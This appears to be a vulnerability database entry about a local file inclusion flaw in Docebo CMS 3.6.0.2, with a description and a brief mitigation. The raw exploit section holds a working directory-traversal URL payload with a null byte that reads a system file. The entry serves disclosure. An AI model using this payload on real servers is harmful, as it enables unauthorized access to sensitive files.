Docebo 3.6.0.2 (stable) Local File Inclusion

vendor:

DoceboCms

by:

Zer0 Thunder

7,5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: DoceboCms

Affected Version From: 3.6.0.2

Affected Version To: 3.6.0.2

Patch Exists: NO

Related CWE: N/A

CPE: docebo:doceboCms:3.6.0.2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP sp2

2010

Docebo 3.6.0.2 (stable) Local File Inclusion

Docebo 3.6.0.2 (stable) is vulnerable to Local File Inclusion. An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal characters (e.g. '../') to the vulnerable server. This can allow the attacker to read sensitive files from the server.

Mitigation:

To mitigate this vulnerability, the application should validate user input and restrict access to sensitive files.

Source

Exploit-DB raw data:

# Exploit Title: Docebo 3.6.0.2 (stable) Local File Inclusion 
# Date: 2010-01-06
# Author: Zer0 Thunder
# Site : http://www.docebolms.org/
# Software Link: http://www.docebolms.org/doceboCms/
# Version: 3.6.0.2
# Tested on: Windows XP sp2 [WampServer 2.0i] 
# CVE : 
# Code :

Exploit :
http://localhost/docebo/index.php?modname=[LFI]&op=lostpwd

Sample : ( Only Tested On Wamp 2.0i)
http://localhost/docebo/index.php?modname=../../../../../../../boot.ini%00&op=lostpwd


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

########################################
# MSN : zer0_thunder@colombohackers.com
# Email : neonwarlock@live.com
# Site : LKHackers.com
# Greetz : To all my friends
# Note : Proud to be a Sri Lankan
# Me : Sri Lankan Hacker
########################################